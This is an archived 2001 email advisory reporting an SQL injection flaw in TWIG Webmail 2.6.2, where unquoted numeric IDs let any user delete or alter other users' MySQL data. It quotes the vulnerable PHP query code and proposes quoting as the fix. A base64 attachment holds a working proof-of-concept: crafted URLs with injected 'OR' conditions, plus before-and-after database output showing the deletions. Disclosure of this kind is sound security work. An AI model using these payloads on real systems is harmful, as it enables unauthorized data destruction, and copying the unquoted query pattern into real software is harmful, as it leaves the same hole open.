Date: Mon, 28 May 2001 21:00:55 +0700 (JAVT)
From: Luki Rustianto <[email protected]>
To: [email protected]Subject: TWIG SQL query bugs
---1765113115-1024798572-991058455=:19797
Content-Type: TEXT/PLAIN; charset=US-ASCII
I can't find the person who really in charge on developing twig, so I
mail about this bug to the person who announce new version of twig
about two month ago.
--------------------------------------------------------------------------
Subject: Unquoted SQL query => potential damage
Software package: TWIG Webmail
Software Site: HTTP://twig.screwdriver.net
Version tested: 2.6.2 and below (used with MySQL, didn't check others)
Platform: Platform independent with PHP
Result: Any user with valid email account can delete or change
other user's data on mysql database.
Proof Of Concept: Attached
Problem Description:
Unquoted SQL query string is a little mistake that could lead to potential
damage.
TWIG free PHP Webmail system is affected. As we know, mysql accept unquoted
query string if the field type is int, mediumint, tinyint or like.
The query:
DELETE FROM mytable WHERE id='1' AND owner='karet'
have the same effect with:
DELETE FROM mytable WHERE id=1 AND owner='karet'
However additional caution must be made if variable 'id' values on above
example is a user suplied data thus could make that user to have control
over sql query and made a modified version of query like:
DELETE FROM mytable WHERE id=1 OR id=2 OR id=3 AND owner='karet'
~~~~~~~~~~~~~~~~
(modified value)
the modified query string above, ofcourse, have diferent meanings :)
value of "$id=1" is changed to "$id=1 OR id=2 OR id=3".
Doing 'grep -r "WHERE id=" <TWIG installation dir>/lib/*' will output
LOT of intresting informations of which function has query string
match our need - this may varies depend on TWIG version you have.
Some of them:
groups/personal.groups.inc.php3:
$query = "UPDATE " . $dbconfig["groups_table"] . " SET groupname='" .
$newname . "' WHERE id=" . $groupid;
[... lots other]
schedule/schedule.edit.inc.php3:
$query = "DELETE FROM " . $dbconfig["schedule_table"] . " WHERE id = " .
$data["id"] . " AND (" . $groupquery . ")";
[... lots other]
... and other files.
Or if you really want to clearly see and debug every query made by TWIG
then with help of query system on TWIG it can be done easilly :)
TWIG has a function named 'dbQuery' that always called on every
sql query request.
(if used with mysql it's on <twig dir>/lib/db/mysql.db.inc.php3)
Add the following code at the top of Function dbQuery( $statement )
to be like (with TWIG 2.6.2):
[SNIP]
$fp = fopen ("/tmp/twig_sql.log", "a");
fwrite ($fp, $statement);
fclose($fp);
[/SNIP]
so every sql request string will be appended to file "/tmp/twig_sql.log".
>From that file you can see every action performed and audit it.
Solutions:
=============
just simply add a proper quoted sign "'" to query string that using
int,mediumint, tinyint and so like field type as WHERE clause.
If the $id values on example above lied between a quoted sign then the query
will looks like:
DELETE FROM mytable WHERE id='1 OR id=2 OR id=3' AND owner='karet'
which will output no result at all ... (on normal operation we can not
inject own quote "'" sign as PHP will filter and change it to "\'")
NB: thx to echo for let me test it (also for the beers ;p).
jenggo <[email protected]>
http://www.karet.org
---1765113115-1024798572-991058455=:19797
Content-Type: TEXT/plain; name="twig.txt"
Content-Transfer-Encoding: BASE64
Content-ID: <[email protected]>
Content-Description: text
Content-Disposition: attachment; filename="twig.txt"
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0N
CltGcmkgTWFyICAyIDIxOjU4OjQ2IEpBVlQgMjAwMV0NClRXSUcgV2VibWFp
bCBVbnF1b3RlZCBRdWVyeSBTdHJpbmcNClByb29mIE9mIENvbmNlcHQgYnkg
amVuZ2dvIDxsdWtpQGthcmV0Lm9yZz4NCj09PT09PT09PT09PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09DQpXZSB3aWxsIHRyeSB0byBkZWxl
dGUgb3RoZXIgdXNlciBteXNxbCBkYXRhLCBpbiB0aGlzIGV4YW1wbGUgJ2Jv
b2ttYXJrcycNCmRhdGEuIFNhbWUgYWN0aW9uIGNhbiBiZSBtYWRlIG9uIG90
aGVyIGRhdGEgbGlrZSAnY29udGFjdCcgb3IgZWxzZSAuLi4NCllvdSBtdXN0
IGhhdmUgZXhpc3RpbmcgZGF0YSBiZWZvcmUgY2hhbmdlL2RlbGV0ZWQgb3Ro
ZXJzLCBzbyBhZGQgaXQgZmlyc3QuDQoNCi0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCg0KTG9naW4gYXMgdXN1YWxsIHVz
ZXIgYWNjb3VudCAoJ2VjYScgaW4gdGhpcyBleGFtcGxlKQ0KYW5kIGdvIHRv
ICdib29rbWFya3MnIG9wdGlvbiBhbmQgY2hvb3NlICdlZGl0Jy4NClZpZXcg
dGhlIHBhZ2Ugc291cmNlIGFuZCBmaW5kIHRoZSBpbXBvcnRhbnQgdmFsdWU6
DQoNCltjdXR0ZWQgdG8gb25seSB2aWV3IHN0cmluZyB3ZSBpbnRlcmVzdGVk
XQ0KDQo8PT0+DQo8aHI+PGZvcm0gYWN0aW9uPS93ZWJtYWlsL2luZGV4LnBo
cDMgbWV0aG9kPVBPU1Q+DQo8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT10d2ln
X3NpZCB2YWx1ZT0iOTgzMzkyNTM5LTEtZWNhIj4NCjxpbnB1dCB0eXBlPWhp
ZGRlbiBuYW1lPXR3aWdfY2lkIHZhbHVlPSI5ODMzOTI1MzktMTQtZWNhIj4N
CjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRhdGFbaWRdIHZhbHVlPTM+DQo8
aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1JdGVtSUQgdmFsdWU9Mz4NCjw9PT4N
CiAgIDxzZWxlY3QgbmFtZT1kYXRhW2dyb3VwaWRdPg0KICAgICAgPG9wdGlv
biB2YWx1ZT0wID5VbmZpbGVkPC9vcHRpb24+DQo8PT0+DQo8aW5wdXQgdHlw
ZT1zdWJtaXQgbmFtZT1zdWJtaXRidXR0b25bZGVsZXRlXSB2YWx1ZT0iRGVs
ZXRlIj4NCjw9PT4NCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tDQpOT1RFOg0KVGhlIHVybCBjb3VsZCBiZSBkaWZmZXJl
bnQgbG9va3MgZGVwZW5kIG9uIHdoYXQgdHlwZSBvZiBhdXRoZW50aWNhdGlv
biB5b3UgdXNlLg0KSSB1c2Ugc3FsdGFibGUgdHlwZSwgaWYgeW91IHVzZSBj
b29raWVzIHR5cGUgdGhlbiB0aGUgdXJsIG1heSAqbXVjaCogbG9uZ2VyDQp0
aGFuIHRoaXMgIQ0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tDQoNCkNvbnN0cnVjdCB0aGUgZXhwbG9pdCB1cmwsDQoNCkFj
dHVhbCB1cmw6DQpodHRwOi8vMTkyLjE2OC4wLjE4L3dlYm1haWwvaW5kZXgu
cGhwMz90cz05ODMzOTI0MjYmdHdpZ19zaWQ9OTgzMzkyNDE0LTEtZWNhJnR3
aWdfY2lkPTk4MzM5MjQxNC0xNC1lY2EmSXRlbUlEPTMNCg0KQ2hhbmdlIGl0
IHRvOg0KaHR0cDovLzE5Mi4xNjguMC4xOC93ZWJtYWlsL2luZGV4LnBocDM/
dHM9OTgzMzkyNDI2JnR3aWdfc2lkPTk4MzM5MjUzOS0xLWVjYSZ0d2lnX2Np
ZD05ODMzOTI1MzktMTQtZWNhJkl0ZW1JRD0yJmRhdGFbZ3JvdXBpZF09MCZz
dWJtaXRidXR0b25bZGVsZXRlXT1EZWxldGUmZGF0YVtpZF09MiUyMG9yJTIw
aWQlM2QyDQoNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLQ0KTk9URToNCndlIGNoYW5nZSBzdHJpbmc6IEl0ZW1JRD0zIHRv
IEl0ZW1JRD0yDQp3ZSBhZGRlZCBzdHJpbmc6ICImZGF0YVtncm91cGlkXT0w
JnN1Ym1pdGJ1dHRvbltkZWxldGVdPURlbGV0ZSZkYXRhW2lkXT0yJTIwb3Il
MjBpZCUzZDIiDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfn5+fn5+
fn5+fn5+fn4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKHRoaXMg
aXMgaXQpDQpvciBmb3IgbW9yZSBkYW1hZ2UgKGRlbGV0aW5nIGFsbCBkYXRh
KToNCmh0dHA6Ly8xOTIuMTY4LjAuMTgvd2VibWFpbC9pbmRleC5waHAzP3Rz
PTk4MzM5MzAwNiZ0d2lnX3NpZD05ODMzOTMwNTAtMS1lY2EmdHdpZ19jaWQ9
OTgzMzkzMDUwLTE0LWVjYSZJdGVtSUQ9MiZkYXRhW2lkXT0yJTIwb3IlMjBn
cm91cGlkJTNkMCZkYXRhW2dyb3VwaWRdPTAmc3VibWl0YnV0dG9uW2RlbGV0
ZV09RGVsZXRlDQogICAgICAgICAgICB+fn5+fn5+fn5+fn5+fn5+fn5+DQog
ICAgICAgICAgICAodGhpcyBpcyBpdCkNCg0Kc28gdGhlIHNxbCBxdWVyeSB3
b3VsZCBjaGFuZ2UgZnJvbToNCg0KREVMRVRFIEZST00gdHdpZ19ib29rbWFy
a3MgV0hFUkUgaWQ9MyBBTkQgZ3JvdXBpZD0wIEFORCB1c2VybmFtZT0nZWNh
Jw0KDQp0bzoNCg0KREVMRVRFIEZST00gdHdpZ19ib29rbWFya3MgV0hFUkUg
aWQ9MiBvciBpZD0yIEFORCBncm91cGlkPTAgQU5EIHVzZXJuYW1lPSdlY2En
DQoNCm9yIGZvciBtb3JlIGRhbWFnZToNCg0KREVMRVRFIEZST00gdHdpZ19i
b29rbWFya3MgV0hFUkUgaWQ9MiBvciBncm91cGlkPTAgQU5EIGdyb3VwaWQ9
MCBBTkQgdXNlcm5hbWU9J2VjYScNCg0KKioqKioqKioqKioqKioqUkVTVUxU
KioqKioqKioqKioqKioqKioqKioNCg0KW0Zyb20gbXlzcWwgY29uc29sZSBi
ZWZvcmUgdGhlIGV4cGxvaXRdDQpteXNxbD4gc2VsZWN0IGlkLHVzZXJuYW1l
LGdyb3VwaWQsdXJsIGZyb20gdHdpZ19ib29rbWFya3M7DQorLS0tLSstLS0t
LS0tLS0tKy0tLS0tLS0tLSstLS0tLS0tKw0KfCBpZCB8IHVzZXJuYW1lIHwg
Z3JvdXBpZCB8IHVybCAgIHwNCistLS0tKy0tLS0tLS0tLS0rLS0tLS0tLS0t
Ky0tLS0tLS0rDQp8ICAxIHwgcG9oZW5rICAgfCAgICAgICAwIHwgenp6eiAg
fA0KfCAgMiB8IHBvaGVuayAgIHwgICAgICAgMCB8IHl5eXl5IHwNCnwgIDMg
fCBlY2EgICAgICB8ICAgICAgIDAgfCBhYWFhICB8DQorLS0tLSstLS0tLS0t
LS0tKy0tLS0tLS0tLSstLS0tLS0tKw0KMyByb3dzIGluIHNldCAoMC4yMSBz
ZWMpDQoNCltGcm9tIG15c3FsIGNvbnNvbGUgYWZ0ZXIgdGhlIGV4cGxvaXRd
DQpteXNxbD4gc2VsZWN0IGlkLHVzZXJuYW1lLGdyb3VwaWQsdXJsIGZyb20g
dHdpZ19ib29rbWFya3M7DQorLS0tLSstLS0tLS0tLS0tKy0tLS0tLS0tLSst
LS0tLS0tLSsNCnwgaWQgfCB1c2VybmFtZSB8IGdyb3VwaWQgfCB1cmwgICAg
fA0KKy0tLS0rLS0tLS0tLS0tLSstLS0tLS0tLS0rLS0tLS0tLS0rDQp8ICAx
IHwgcG9oZW5rICAgfCAgICAgICAwIHwgenp6eiAgIHwNCnwgIDMgfCBlY2Eg
ICAgICB8ICAgICAgIDAgfCBhYWFhICAgfA0KKy0tLS0rLS0tLS0tLS0tLSst
LS0tLS0tLS0rLS0tLS0tLS0rDQoyIHJvd3MgaW4gc2V0ICgwLjAyIHNlYykN
Cg0KYXMgdXNlciAnZWNhJyB3ZSBjb3VsZCBkZWxldGUvdXBkYXRlIHVzZXIg
J3BvaGVuaycgZGF0YSBvciBlbHNlLg0KDQoNCltGcmkgTWFyICAyIDIxOjU4
OjQ2IEpBVlQgMjAwMV0gLSBqZW5nZ28gPGx1a2lAa2FyZXQub3JnPg0KDQoN
Cg0KDQo=
---1765113115-1024798572-991058455=:19797--
